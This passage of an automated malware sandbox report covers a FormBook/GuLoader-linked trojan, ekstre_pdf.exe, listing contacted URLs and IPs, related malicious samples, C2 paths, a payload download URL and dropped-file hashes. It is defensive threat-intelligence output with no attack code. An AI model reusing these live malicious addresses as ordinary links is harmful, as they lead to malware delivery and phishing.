http://www.crosswalkconsulting.co.ukReferer:	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jewelry2adore.biz	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	explorer.exe, 00000002.00000000.2967197468.000000000D033000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3131449854.000000000D033000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.bril-kre-l25.buzz/mi94/	explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.iltuosentiero.com	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.luivix.onlineReferer:	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dinero.news/mi94/www.tmcgroup.africa	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.binC	ekstre_pdf.exe, 00000001.00000002.3083908208.0000000003CBE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.sneakersuomo.comReferer:	explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kevinjasperinc.africa/mi94/	explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jenniferfalconerrealtor.comReferer:	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.furniture-42269.com/mi94/www.centracul.online	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.licensescape.com/mi94/www.jenniferfalconerrealtor.com	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.zetuinteriors.africa	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin;	ekstre_pdf.exe, 00000001.00000002.3083908208.0000000003CA9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.tmcgroup.africa/mi94/www.zetuinteriors.africa	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.crosswalkconsulting.co.uk/mi94/	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jenniferfalconerrealtor.com	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/(	explorer.exe, 00000002.00000002.7589258600.000000000D238000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6431275863.000000000D238000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3101932906.000000000D1F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6440429762.000000000D238000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2967197468.000000000D1F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3131168321.000000000D237000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.healthinsurancearena.com	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bellvaniamail.com/mi94/www.furniture-42269.com	explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://img.sedoparking.com	explorer.exe, 00000002.00000002.7600570476.00000000119EF000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000004.00000002.7565262572.0000000003A8F000.00000004.10000000.00040000.00000000.sdmp	false		high
http://www.healthinsurancearena.com/mi94/www.furniture-42269.com	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.micro	explorer.exe, 00000002.00000002.7575424633.000000000A720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.7574869150.0000000009F20000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2945890949.0000000002290000.00000002.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hanfengmeiye.com/mi94/www.sneakersuomo.com	explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.centracul.online	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://aka.ms/odirm	explorer.exe, 00000002.00000000.2956783769.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7570471488.000000000906A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3115944708.0000000008FC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6440741929.0000000009069000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.bril-kre-l25.buzzReferer:	explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	ekstre_pdf.exe, 00000001.00000001.2824065477.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jewelry2adore.biz/mi94/www.licensescape.com	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
198.54.117.217	unknown	United States	22612	NAMECHEAP-NETUS	true
198.54.117.218	parkingpage.namecheap.com	United States	22612	NAMECHEAP-NETUS	false
38.163.115.131	www.xqan.net	United States	174	COGENT-174US	true
185.53.179.90	www.furniture-42269.com	Germany	61969	TEAMINTERNET-ASDE	true
185.53.179.91	www.credit-cards-54889.com	Germany	61969	TEAMINTERNET-ASDE	true
204.11.56.48	www.jewelry2adore.biz	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	true
66.29.154.110	healthinsurancearena.com	United States	19538	ADVANTAGECOMUS	true
3.64.163.50	www.licensescape.com	United States	16509	AMAZON-02US	true
64.190.63.111	www.dinero.news	United States	11696	NBS11696US	true
2.23.209.29	unknown	European Union	1273	CWVodafoneGroupPLCEU	false
160.121.87.199	www.anjin98.com	South Africa	137951	CLAYERLIMITED-AS-APClayerLimitedHK	true
91.223.253.105	athle91.com	France	34235	ASPSERVEUR-ASFR	true
34.138.169.8	unknown	United States	2686	ATGS-MMD-ASUS	true
62.149.128.45	iltuosentiero.com	Italy	31034	ARUBA-ASNIT	true
64.246.164.134	lb-agent-dugout-pr.moxiworks.com	United States	6295	GREENHOUSE-WAUS	false

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	844419
Start date and time:	2023-04-11 09:45:34 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 16m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	ekstre_pdf.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@369/14@24/15
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 12.7% (good quality ratio 12.2%) Quality average: 80.6% Quality standard deviation: 25.8%
HCA Information:	Successful, ratio: 84% Number of executed functions: 59 Number of non-executed functions: 285
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): audiodg.exe, UserOOBEBroker.exe, RuntimeBroker.exe, ShellExperienceHost.exe
Excluded IPs from analysis (whitelisted): 20.190.159.75, 20.190.159.73, 20.190.159.68, 20.190.159.0, 40.126.31.69, 20.190.159.64, 20.190.159.23, 40.126.31.67, 209.197.3.8, 51.105.236.244, 20.82.207.122
Excluded domains from analysis (whitelisted): client.wns.windows.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, www.tm.lg.prod.aadmsa.akadns.net, www.tm.v6.a.prd.aadg.trafficmanager.net, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wdcp.microsoft.com, wu-bg-shim.trafficmanager.net, wd-prod-cp.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, prdv6a.aadg.msidentity.com, wdcpalt.microsoft.com, login.live.com, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
198.54.117.217	J2wqtV6Si7.exe	Get hash	malicious	FormBook	Browse	www.artbychimps.com/bd16/?4hbh=ome7/67TVEHp9WucuGVyDP7NwDuhBRbM4Of5QTXN7TAtCJBwsTWAx6+p8OFNmR0u5wg+&2dT=z8T4G2sh
	ngZItFIK2T.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.goingsalary.tech/u34f/?kTzXoTR=97Smc52Wk4ahzbCofQIJWIEteLfZTmyYwkrG2H26vN4orE7r4acBUJnrxZLf35d3qBDU&4hrln=1bxh2
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.crosswalkconsulting.co.uk/mi94/?w88pk=CmkHYlvtWFyiY6x7wzgggV7o1XWqH1EIkW2vDHN+0HbYWyx2WNdLHwPWYAq7GV6cOSXz&Sr94=9rXXvvGp
	XBAo84Asbf.exe	Get hash	malicious	FormBook	Browse	www.weziclondon.com/jr22/?3fcLj=tboabiXtv8YO4WBbFrHH+pHkPvR3ydWuAlC5osxbXySVI+RuZzsY0NcjAOFhvQu7vGfi&DX6pO=CpKpdfR
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.crosswalkconsulting.co.uk/mi94/?b48LI=EhOhAfF&Lj8DtN=CmkHYlvtWFyiY6x7wzgggV7o1XWqH1EIkW2vDHN+0HbYWyx2WNdLHwPWYAq7GV6cOSXz
	rekstre.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.innerworldly.world/mn82/?t4KP62L=dPqooqBtsg1FdAGXMZSVXxaIrzmGCfGQc+TwEy/F1u+WDx+KekmL5g7uc6pMYv+4CO0K&5j-xt=7nOxwVJ
	QUOTES#U007e0.EXE.exe	Get hash	malicious	FormBook	Browse	www.ibbs.site/rs11/
	m9tbJeBWgx.exe	Get hash	malicious	FormBook	Browse	www.askmsjen.net/vr21/?mT8H=9rsTgZV8Fft8p&x48lkjR=QKip4Yb4GODHGWRq04HxUwyU9f2Wn8oTgtzthUZkAGu9QveZIdoNrPbQcZGZpgSIJyysbORbbQ==
	TEKL#U0130F #U0130STEME.exe	Get hash	malicious	FormBook	Browse	www.raitarantula.com/tc10/?_0DPn=XTkgCx++IATyjpDX6IgSYWtE+tl+CkUcx9BqyaaMRTfXOgUR3vh/G0j3tYK3dRbwrJ+j&b8Rl4b=0L3070CH3BVHf0
	http___185.246.221.143_pl2.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.historicalstones.com/d06c/?mHC=BVZfKNQjqjrho7W7VAvRGlOR9lTynnt9iJzJr2e1Y+bc1bvnvS3n9635bjJc4UJE0Vn9&7n=7nWd7RmXyP1LGne
	new order.com.exe	Get hash	malicious	FormBook	Browse	www.1stpartynft.com/p94a/?mFQH3b=7n0tFFzX0lc&3feX=G1hDd+kqyj/rlUv4e6oFYqMDZ+tje9QIUkQpuLRjfWjB/AEkQcJihDuyX/8PBpJb8hl3
	DHL shipment tax invoice DHAIR00233210 2022 10 23.exe	Get hash	malicious	FormBook	Browse	www.weziclondon.com/jr22/?8pTdP=8pT8G&w6VLpxth=tboabiXtv8YO4WBbFrHH+pHkPvR3ydWuAlC5osxbXySVI+RuZzsY0NcjANpizgiDini0MDmOEA==
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.nuclearwars.info/re92/?tVSHif=kTBTfHp&0R=1PyEDmHo8MBo+WcSgVUln9EWX/d4QxLpvjyEE56Gm4NN1dEx4JiHh+xwWBXZZYZbap8n
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.roguesgear.net/my23/?q0GhIva0=IREhEw25+o117TcGnFYq+oSep2yMGaLH7MA9RuxqO5QuYCV6ptM5GUuVXFlOYAI1OQ5h&iFNL=RloxnFk
	MV. WBC TBN 1._PARTICULARS.exe	Get hash	malicious	FormBook	Browse	www.govvifuelboostingtab.com/ermr/?GlL=d/CCFM+sk0qZAIT9tnrahKLFfq+oBDZG3AkELLmsueDWvpoCjCHpWKJfIYyz20R5uT5LYVSR0ZJ9lEKjLSdUy1VPbwTbTwoLOA==&JJEhEH=s8plpdxx
	Netanya Farm project (Phase II).vbs	Get hash	malicious	FormBook, GuLoader	Browse	www.mysolarsquad.energy/al24/
	textview34532.exe	Get hash	malicious	FormBook	Browse	www.congregorecruitment.co.uk/t01w/?dXI83pb8=N8/3JHAsvZ0sAT83NREy0uUKe8PdHduz1YQ9eJ6KQNipkSqqS32mlZOXYa+JJsfOWhOx&9rIxB=Ev0464dPHDcHzJd0
	Transferecia.vbs	Get hash	malicious	FormBook, GuLoader	Browse	www.kangaslamminauto.net/s46e/
	4JVupeiSoQ.exe	Get hash	malicious	FormBook	Browse	www.repecctehpamp.com/os56/?5j=LJLjVVUAEzY7LhdL18SGHcJHu9jLYvB1Z4EyNMtEgw8LfQ8bY+amEv6bMX1yJuL2GnL0OAYCBw==&7n=4hlTXDo
	Request for 3 family.exe	Get hash	malicious	FormBook	Browse	www.dominiclis.com/rsea/?7nXX=VoCwu5ifwNhrSojdtTdQnzmIFglOPYUUIRGCioBSjYvv4j4TDmUep4P1BV/bkC3yGpcf&j0GP4=RbEhR8CHdpjL6XUp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.hanfengmeiye.com	E-dekont.exe	Get hash	malicious	FormBook, GuLoader	Browse	154.23.133.34
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	154.23.133.34
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	154.23.133.34
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	154.23.133.34
www.xqan.net	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	38.163.115.131
www.xqan.net	rE-dekont_pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	38.163.115.131
parkingpage.namecheap.com	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.218
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.212
	rE-dekont_pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.218
	387263527630093.exe	Get hash	malicious	DBatLoader, FormBook	Browse	198.54.117.215
	U_prilogu_je_nova_lista_narudzbi.exe	Get hash	malicious	FormBook, DBatLoader	Browse	198.54.117.210
	J2wqtV6Si7.exe	Get hash	malicious	FormBook	Browse	198.54.117.211
	ngZItFIK2T.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.217
	nsg5uov8KS.exe	Get hash	malicious	FormBook	Browse	198.54.117.215
	E-dekont.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.212
	770530986300323.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.216
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.215
	FATURA_DE_PAGAMENTO.exe	Get hash	malicious	FormBook	Browse	198.54.117.216
	DETALLES_DEL_PAGO.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.216
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.212
	ekstre.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.216
	ekstre.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.215
	5wQUsLdtQY.exe	Get hash	malicious	FormBook	Browse	198.54.117.216
	Arrival Notice_6648122036.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.216
	file.exe	Get hash	malicious	FormBook, Play	Browse	198.54.117.217
	rBillOfQuantity.exe	Get hash	malicious	FormBook, Play	Browse	198.54.117.212

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NAMECHEAP-NETUS	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.218
	Order.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	198.54.116.10
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.215
	IMG_100783133pdf.exe	Get hash	malicious	AgentTesla	Browse	63.250.35.178
	https://sites.google.com/view/htc-global-servicess/home	Get hash	malicious	HTMLPhisher	Browse	198.54.115.111
	rE-dekont_pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.218
	Invoice_&_Packing_List.exe	Get hash	malicious	FormBook	Browse	199.192.26.35
	CSHA20230011.pdf.lnk	Get hash	malicious	Unknown	Browse	104.219.248.27
	IMG_20783_1123708pdf.exe	Get hash	malicious	AgentTesla	Browse	63.250.35.178
	http://fuseservice.com	Get hash	malicious	Unknown	Browse	63.250.43.133
	file.exe	Get hash	malicious	FormBook	Browse	199.192.30.147
	https://spaceaction.info/enr/enr.php	Get hash	malicious	Unknown	Browse	199.188.200.154
	https://royalqcoin.finance/ms/ms.php	Get hash	malicious	Unknown	Browse	198.54.115.220
	DWngv5D73c.exe	Get hash	malicious	AgentTesla	Browse	198.54.122.135
	uazqhOk6p5.exe	Get hash	malicious	FormBook	Browse	199.192.26.35
	Purchase_Order#_DE198594RT57.exe	Get hash	malicious	AgentTesla	Browse	198.54.122.135
	S0A.doc.exe	Get hash	malicious	FormBook	Browse	199.192.26.35
	Purchase_Order.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	198.54.116.10
	https://elontec-my.sharepoint.com:443/:o:/p/nperry/EmeyOnli8KBNjCKgxjDIgAIBwvACAo7MhRoeKto54N_vzA?e=5:jDncMO&at=9	Get hash	malicious	SharepointPhisher	Browse	185.61.154.62
	387263527630093.exe	Get hash	malicious	DBatLoader, FormBook	Browse	198.54.117.215
NAMECHEAP-NETUS	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.218
	Order.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	198.54.116.10
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.215
	IMG_100783133pdf.exe	Get hash	malicious	AgentTesla	Browse	63.250.35.178
	https://sites.google.com/view/htc-global-servicess/home	Get hash	malicious	HTMLPhisher	Browse	198.54.115.111
	rE-dekont_pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.218
	Invoice_&_Packing_List.exe	Get hash	malicious	FormBook	Browse	199.192.26.35
	CSHA20230011.pdf.lnk	Get hash	malicious	Unknown	Browse	104.219.248.27
	IMG_20783_1123708pdf.exe	Get hash	malicious	AgentTesla	Browse	63.250.35.178
	http://fuseservice.com	Get hash	malicious	Unknown	Browse	63.250.43.133
	file.exe	Get hash	malicious	FormBook	Browse	199.192.30.147
	https://spaceaction.info/enr/enr.php	Get hash	malicious	Unknown	Browse	199.188.200.154
	https://royalqcoin.finance/ms/ms.php	Get hash	malicious	Unknown	Browse	198.54.115.220
	DWngv5D73c.exe	Get hash	malicious	AgentTesla	Browse	198.54.122.135
	uazqhOk6p5.exe	Get hash	malicious	FormBook	Browse	199.192.26.35
	Purchase_Order#_DE198594RT57.exe	Get hash	malicious	AgentTesla	Browse	198.54.122.135
	S0A.doc.exe	Get hash	malicious	FormBook	Browse	199.192.26.35
	Purchase_Order.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	198.54.116.10
	https://elontec-my.sharepoint.com:443/:o:/p/nperry/EmeyOnli8KBNjCKgxjDIgAIBwvACAo7MhRoeKto54N_vzA?e=5:jDncMO&at=9	Get hash	malicious	SharepointPhisher	Browse	185.61.154.62
	387263527630093.exe	Get hash	malicious	DBatLoader, FormBook	Browse	198.54.117.215

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse
	E-dekont_pdf.exe	Get hash	malicious	GuLoader	Browse
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	GuLoader	Browse
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	GuLoader	Browse
	rE-dekont_pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse
	rE-dekont_pdf.exe	Get hash	malicious	GuLoader	Browse
	AWB_Invoice.exe	Get hash	malicious	FormBook, GuLoader	Browse
	AWB_Invoice.exe	Get hash	malicious	GuLoader	Browse
	Swift_mesaj.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Swift_mesaj.exe	Get hash	malicious	GuLoader	Browse
	Halkbank_Ekstre_20191415_081738_949589.pdf.exe	Get hash	malicious	GuLoader	Browse
	Halkbank_Ekstre_20191415_081738_949589.pdf.exe	Get hash	malicious	GuLoader	Browse
	Halkbank_Ekstre_20191415_081738_949589.pdf.exe	Get hash	malicious	GuLoader	Browse
	Halkbank_Ekstre_20191415_081738_949589.pdf.exe	Get hash	malicious	GuLoader	Browse
	Dekont.pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Dekont.pdf.exe	Get hash	malicious	GuLoader	Browse
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Eksamenskvotientens144\Nephrosclerosis\Dingwall\Falcinellus.Ter

Download File

Process:	C:\Users\user\Desktop\ekstre_pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	118234
Entropy (8bit):	4.607661447027023
Encrypted:	false
SSDEEP:	1536:ylLWTCJvwUBd4k9UhHtiMMpNgr5VmxzdYP62BVyIB09v97/:y1WCJvwUz4P8MemdgeFVp0d/
MD5:	2599B16AC5097A58A6F1C3DFAC7730E7
SHA1:	E8F3ACAF3A392D8965E92D2F74DC03DD2AF651D0
SHA-256:	439DB069844B42C4BD044D6727B6DEFE6B3168DD44C85B5BB26528BDA7939CA8
SHA-512:	C79BF2DFC323DF6E946EA3F0274500694AAED096D9C4E2C0A0BF60FBA0B6AAED1C93D8126685D9B41F543E5AB9AFE1662FCCE400077A7C1390CD08B1E5AB6ABC
Malicious:	false
Reputation:	low
Preview:	.......................................E.............$..............y...www...........V............$$......rr...........................W....................f.j............3......KKKKK......................}}....m........................uu..........000.......................X.....uu........<....\|\|\|\|.........))......../.^^..............,.ff...........&....H..n.......................................SS........xxx..........yyyyy.......I............M.....0...=====..............<....$$$.....&.....88...................MM.A.................1..W.999999999.....'.....>...........>...........9..;.....D..'........*..p..........................ZZZ....R........................EE.....................U................l.....k..!!...................fffff......................G.....7.SSSS..BBB.N...``....OOOO.....................b..[[[[[...p.............;............FFF.rrrr.......0........................uu.........XXXX.....BB...........33..................................^..$$$..N...yy...................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Eksamenskvotientens144\Nephrosclerosis\Dingwall\battery-level-100-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\ekstre_pdf.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	934
Entropy (8bit):	5.137654530410834
Encrypted:	false
SSDEEP:	24:t4CzVkcqy5BrpayyKbRAecFhBrNxrGDT/al10rGuK8:pkqvayNtAecFZwDT/uRz8
MD5:	E1B8C91A6215687BC2E88E3073A3832F
SHA1:	62D2D67DD9E8DD439DA836A48519A0D45B040254
SHA-256:	0C41DB76E8FD3C2307AFBA64D4CB790CCB7C57FBC5A8C4987FDDC2CFAAF2223D
SHA-512:	26F6C3E455B073EB4E9F7114984DE658E24F00345B16FB65DC79B7D707EBF499ADCB72AF35AE88E3591703A2EE56DAA4992AC7956A215D2A27B5452B885461B4
Malicious:	false
